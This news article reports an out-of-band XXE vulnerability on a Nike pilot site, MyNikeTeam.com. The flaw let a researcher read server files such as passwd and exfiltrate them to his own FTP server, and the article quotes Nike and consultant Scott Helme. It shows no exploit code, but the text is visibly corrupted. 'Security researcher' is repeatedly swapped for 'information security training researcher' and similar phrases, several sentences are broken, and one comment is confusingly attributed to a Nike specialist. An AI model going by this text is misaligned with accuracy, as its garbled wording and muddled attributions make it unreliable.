A previously undisclosed vulnerability in Nike’s website allowed anyone with a few lines of code to read server data like passwords, which could have provided greater access to the company’s private systems.
An information security training researcher Corben Leo discovered the flaw late last year and contacted Nike through the company’s dedicated email address for reporting security vulnerabilities, which it advertises on its bug bounty page. After Nike doesn’t respond for more than three months, Leo contacted a cyber security news site, which also alerted the company to the vulnerability.
The bug exploited an out-of-band XML external entities (OOB-XXE) flaw that abused how Nike’s website parses XML-based files, allowing the researcher to read files directly on the server. OOB-XXE vulnerabilities are widely seen as difficult to carry out, but can be used to gain deep access to a server’s internals. Gaining access to a server’s files can disclose other avenues for exploitation, such as remote code execution or pivoting to other connected servers or databases.
The exploit code, just over a dozen lines in Python, let Leo was able to capture the data stored on a Nike.com subdomain, to an external listening FTP server he operated, which spit out the file’s results line by line. A video of the exploit in action revealed the contents of the server’s, passwd file, which included every username able to log in to the server, such as system administrators.
A Nike spokesperson confirmed the flaw is now fixed, but downplayed any risk to other systems. “MyNikeTeam.com site was a pilot site that was active for a few months last year and was hosted on a separate server to the main Nike.com site. It has now been retired to address this issue. We appreciate any notification that helps us maintain data security,” the spokesperson said.
Nike isn’t just a sports apparel retail giant. In the past few years, the company has been aggressively pushing into the data-gathering market by implementing sports and activity tracking into its products, as well as creating its own line of wearables, a market it since exited from, but still integrates its technology with other branded wearables.
An information security training specialist from Nike comment that the site was designed for wholesale customers and not ordinary consumers, but still allowed users to log in with their Nike.com username and password. Nike said its micro-service architecture and server setup meant user data was never at risk by the bug.
A video and proof-of-concept (PoC) code was passed to Scott Helme, a UK-based information security training researcher and consultant, to independently review.
“The issue here is pretty severe and the information security training researcher found a very nice OOB-XXE injection vulnerability,” said Helme. “As can be seen in the demo video, the PoC extracted the contents of the passwd file on the host and sent them to a remote server under the control of the researcher, proving the vulnerability is valid and that data can be filtrated from the host.”
“The response from Nike was to take the affected site offline but this doesn’t address the concerns around any data that was processed and the access to other internal systems that an attacker would have had,” the information security training consultant added.
“With a login form on the page it’s more than reasonable to assume that credentials were processed on the affected site whilst this vulnerability was present,” the information security training expert said. “Also, an attacker could have leveraged to probe other systems and services adjacent to, or accessible from, this particular host.”